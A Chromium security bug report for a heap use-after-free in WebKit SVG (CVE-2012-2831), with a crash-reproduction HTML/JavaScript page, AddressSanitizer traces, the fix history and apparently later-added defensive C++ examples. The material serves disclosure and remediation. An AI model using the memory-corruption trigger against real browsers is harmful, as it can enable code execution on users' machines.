Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.




Issue 130356: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Reported by miau...@gmail.com, May 30 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

VERSION
Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)

        document.body.appendChild(document.createTextNode('A'))

        el1=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el1.setAttribute('id','el1')
        el1.appendChild(document.createTextNode('A'))
        document.body.appendChild(el1)

        document.body.appendChild(document.createTextNode('A'))

        el2=document.createElementNS('http://www.w3.org/2000/svg', 'image')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)

        el3=document.createElementNS('http://www.w3.org/2000/svg', 'textPath')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el1')
        el2.appendChild(el3)

        el4=document.createElementNS('http://www.w3.org/2000/svg', 'use')
        el4.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el2')
        el0.appendChild(el4)

        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('ForwardDelete')
        setTimeout("location.reload()", 10)
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 


==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0


0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
 
Attachments: 0392.txt (12.4 KB), 0392.html (1.4 KB)

Comment 1 by infe...@chromium.org, May 30 2012

Cc: fmalita@chromium.org pdr@chromium.org schenney@chromium.org
Labels: WebKit-SVG

Comment 2 by infe...@chromium.org, May 30 2012

Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=53433906

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
  WebCore::SVGElement::removedFrom
  - free stack -
  WebCore::SVGElementInstance::detach
  WebCore::SVGElementInstance::~SVGElementInstance
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=139300:139395

Minimized Testcase (1.10 Kb): https://cluster-fuzz.appspot.com/download/AMIfv968MsHol1ezUseel0zNe5P-oaASUNtgTePunUuguxHTOK7rPf9Ru4zchHA_0hpVVeJce2QxCiJW1IxrXN6BK8BCTlov6UkFNI1qHHdwJnyzZrlarRIN0PkPXD1t_VQjgZNyu9r1tn7nrmRmBSIbVYU2gxQj5s66LkRBOnQzYdrOG8X1B9c

Comment 3 by infe...@chromium.org, May 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regresse

Comment 4 by pdr@chromium.org, Jun 1 2012

https://bugs.webkit.org/show_bug.cgi?id=15799 looks like the most probable regresse

Comment 5 by infe...@chromium.org, Jun 1 2012

Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)

Comment 6 by pdr@chromium.org, Jun 1 2012

Labels: WebKit-ID-88144
Upstream: https://bugs.webkit.org/show_bug.cgi?id=88144

Comment 7 by palmer@chromium.org, Jun 5 2012

Owner: pdr@chromium.org
According to https://bugs.webkit.org/show_bug.cgi?id=15799, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)

Comment 8 by pdr@chromium.org, Jun 5 2012

This bug is still present; you need to use an ASAN build to hit it, though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.

Comment 9 by pdr@chromium.org, Jun 6 2012

I'm now on this bug.

Comment 10 by pdr@chromium.org, Jun 12 2012

Small update: I haven't forgotten about this (it's my top issue).

Comment 11 by pdr@chromium.org, Jun 14 2012

Patch up!

Comment 12 by pdr@chromium.org, Jun 14 2012

@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.

Comment 13 by infe...@chromium.org, Jun 18 2012

Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/120559. Philip, does this need merging for m20? That function looked old; it might be that some new code just helped to trigger this.

Comment 14 by pdr@chromium.org, Jun 18 2012

I think this does need merging. http://trac.webkit.org/changeset/118609 introduced the textPath regression, but http://trac.webkit.org/changeset/107067 is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.
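
Added example, not WebKit code and not the fix landed in the changesets above: a simplified model of the reference-tracking pattern this bug lives in. The sanitizer trace shows the registry in SVGDocumentExtensions reading an element that SVGElementInstance::detach() had already freed, i.e. the table still held a raw pointer to a referencing element after its owner destroyed it. The model below replaces raw pointers with generation-checked weak handles, so an entry whose element has already been destroyed resolves to null and is skipped rather than dereferenced. All class and function names, the slot-table design and the notification counter are assumptions chosen to illustrate the pattern; the element ids mirror the reproduction case only for readability.

```cpp
// Added example (not WebKit code): a "who references whom" table in the spirit
// of SVGDocumentExtensions, hardened against the ordering in this report. The
// original held raw pointers to referencing elements; SVGElementInstance::detach()
// freed one that was still in the table, and removeAllElementReferencesForTarget()
// then read freed memory. Here the table stores generation-checked weak handles:
// an entry whose element is already gone resolves to null and is skipped.
// Names below are illustrative, not WebKit's.
#include <cstdint>
#include <map>
#include <memory>
#include <set>
#include <string>
#include <vector>

struct Element {
    std::string id;
    int targetRemovedNotifications = 0;  // bumped when a referenced target goes away
    explicit Element(std::string elementId) : id(std::move(elementId)) {}
};

// Weak handle: slot index plus the generation the slot had when issued.
struct Handle {
    uint32_t slot = 0;
    uint32_t generation = 0;
    bool operator<(const Handle& o) const {
        return slot != o.slot ? slot < o.slot : generation < o.generation;
    }
};

// Owns every element. Raw pointers leave only via resolve(), which refuses a
// handle whose generation no longer matches the slot.
class ElementTable {
public:
    Handle allocate(std::unique_ptr<Element> e) {
        uint32_t idx;
        if (freeList_.empty()) { idx = static_cast<uint32_t>(slots_.size()); slots_.emplace_back(); }
        else { idx = freeList_.back(); freeList_.pop_back(); }
        slots_[idx].element = std::move(e);
        return Handle{idx, slots_[idx].generation};
    }
    // Destroys the element and bumps the generation so outstanding handles go stale.
    void release(Handle h) {
        if (!resolve(h)) return;
        slots_[h.slot].element.reset();
        slots_[h.slot].generation++;
        freeList_.push_back(h.slot);
    }
    Element* resolve(Handle h) const {
        if (h.slot >= slots_.size()) return nullptr;
        const Slot& s = slots_[h.slot];
        return s.generation == h.generation ? s.element.get() : nullptr;
    }
private:
    struct Slot { std::unique_ptr<Element> element; uint32_t generation = 0; };
    std::vector<Slot> slots_;
    std::vector<uint32_t> freeList_;
};

struct RemovalResult {
    int notified = 0;  // live referrers told their target is gone
    int stale = 0;     // entries whose element was already destroyed
};

class ReferenceRegistry {
public:
    explicit ReferenceRegistry(ElementTable& table) : table_(table) {}
    void addElementReferencingTarget(Handle referrer, const std::string& targetId) {
        referrersByTarget_[targetId].insert(referrer);
    }
    // Called when the target leaves the document. Stale entries are dropped, not dereferenced.
    RemovalResult removeAllElementReferencesForTarget(const std::string& targetId) {
        RemovalResult r;
        auto it = referrersByTarget_.find(targetId);
        if (it == referrersByTarget_.end()) return r;
        for (Handle h : it->second) {
            if (Element* e = table_.resolve(h)) { e->targetRemovedNotifications++; r.notified++; }
            else r.stale++;
        }
        referrersByTarget_.erase(it);
        return r;
    }
private:
    ElementTable& table_;
    std::map<std::string, std::set<Handle>> referrersByTarget_;
};

// Replays the report's ordering: one referrer is torn down by a path that never
// unregistered it, then the target is removed. Expected: 1 notified, 1 stale.
RemovalResult replayDetachThenRemoveTarget() {
    ElementTable table;
    ReferenceRegistry registry(table);
    table.allocate(std::make_unique<Element>("el1"));               // the target
    Handle el3 = table.allocate(std::make_unique<Element>("el3"));  // xlink:href="#el1"
    Handle el4 = table.allocate(std::make_unique<Element>("el4"));  // xlink:href="#el1"
    registry.addElementReferencingTarget(el3, "el1");
    registry.addElementReferencingTarget(el4, "el1");
    table.release(el3);  // freed without unregistering, as detach() did in the report
    return registry.removeAllElementReferencesForTarget("el1");
}
```

The generation counter is what makes a reused slot safe: after release() the same slot index can be handed to a fresh element, but the old handle carries the previous generation and still resolves to null. Comment 14's remark that feImageElement shares the same resource-handling model is the reason to fix the registry's storage rather than one caller's teardown order.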

Comment 15 by infe...@chromium.org, Jun 18 2012

Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta
Perfect.

Comment 16 by scarybea...@gmail.com, Jun 19 2012

Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M20: http://trac.webkit.org/changeset/120762

Comment 17 by scarybea...@gmail.com, Jun 19 2012

Labels: reward-topanel

Comment 18 by pdr@chromium.org, Jun 19 2012

Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
<image>
  <textPath/>
</image>
to begin with.
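
Added example, not WebKit code: a minimal content-model check of the kind comment 18 describes, run over the element tree from this report's reproduction case (svg > image > textPath, svg > use). The allowed-children table is a deliberately small subset drawn from the SVG 1.1 content model and covers only the elements that appear on this page; it is an assumption for illustration, not a complete specification, and the node type and function names are invented here.

```cpp
// Added example (not WebKit code): walks an SVG element tree and reports every
// parent>child pairing the content model rejects. The table is a small subset
// of SVG 1.1 (assumption): <image> admits only descriptive and animation
// elements, so <textPath> under <image> is flagged, as comment 18 expects.
#include <map>
#include <memory>
#include <set>
#include <string>
#include <vector>

struct SvgNode {
    std::string tag;
    std::vector<std::unique_ptr<SvgNode>> children;
    explicit SvgNode(std::string t) : tag(std::move(t)) {}
    SvgNode* add(std::string t) {
        children.push_back(std::make_unique<SvgNode>(std::move(t)));
        return children.back().get();
    }
};

// Parent tag -> tags it may directly contain (subset of SVG 1.1, see above).
static const std::map<std::string, std::set<std::string>> kAllowedChildren = {
    {"svg",      {"svg", "image", "use", "text", "desc", "title", "metadata"}},
    {"image",    {"desc", "title", "metadata", "animate", "set", "animateTransform", "animateMotion"}},
    {"use",      {"desc", "title", "metadata", "animate", "set", "animateTransform", "animateMotion"}},
    {"text",     {"textPath", "tspan", "desc", "title", "metadata"}},
    {"textPath", {"tspan", "desc", "title", "metadata"}},
};

// Returns "a>b>c" paths for every child its parent may not contain; a parent
// missing from the table rejects all children.
std::vector<std::string> findContentModelViolations(const SvgNode& node, const std::string& path = "") {
    std::vector<std::string> out;
    std::string here = path.empty() ? node.tag : path + ">" + node.tag;
    auto allowed = kAllowedChildren.find(node.tag);
    for (const auto& child : node.children) {
        if (allowed == kAllowedChildren.end() || !allowed->second.count(child->tag))
            out.push_back(here + ">" + child->tag);
        auto nested = findContentModelViolations(*child, here);
        out.insert(out.end(), nested.begin(), nested.end());
    }
    return out;
}

// Builds the tree from this report's reproduction case and checks it.
std::vector<std::string> checkReportedTree() {
    SvgNode root("svg");                 // el0
    SvgNode* image = root.add("image");  // el2
    image->add("textPath");              // el3: not valid inside <image>
    root.add("use");                     // el4: valid inside <svg>
    return findContentModelViolations(root);
}
```

Rejecting the nesting at parse or insertion time removes the textPath-inside-image shape entirely, which is a separate layer of defence from fixing the reference registry: the registry fix stops a stale entry from being dereferenced, while the content-model check stops the invalid tree from being built in the first place.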

Comment 20 by scarybea...@gmail.com, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000

Comment 21 by scarybea...@gmail.com, Jun 25 2012

Labels: CVE-2012-2831

Comment 22 by scarybea...@gmail.com, Jul 9 2012

Labels: -reward-unpaid

Comment 23 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 24 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 25 by laforge@google.com, Jan 18 2013

Labels: Restrict-View-EditIssue

Comment 26 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 27 by bugdroid1@chromium.org, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 28 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 29 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 30 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 31 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 32 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 33 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 34 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 35 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 38 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 39 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
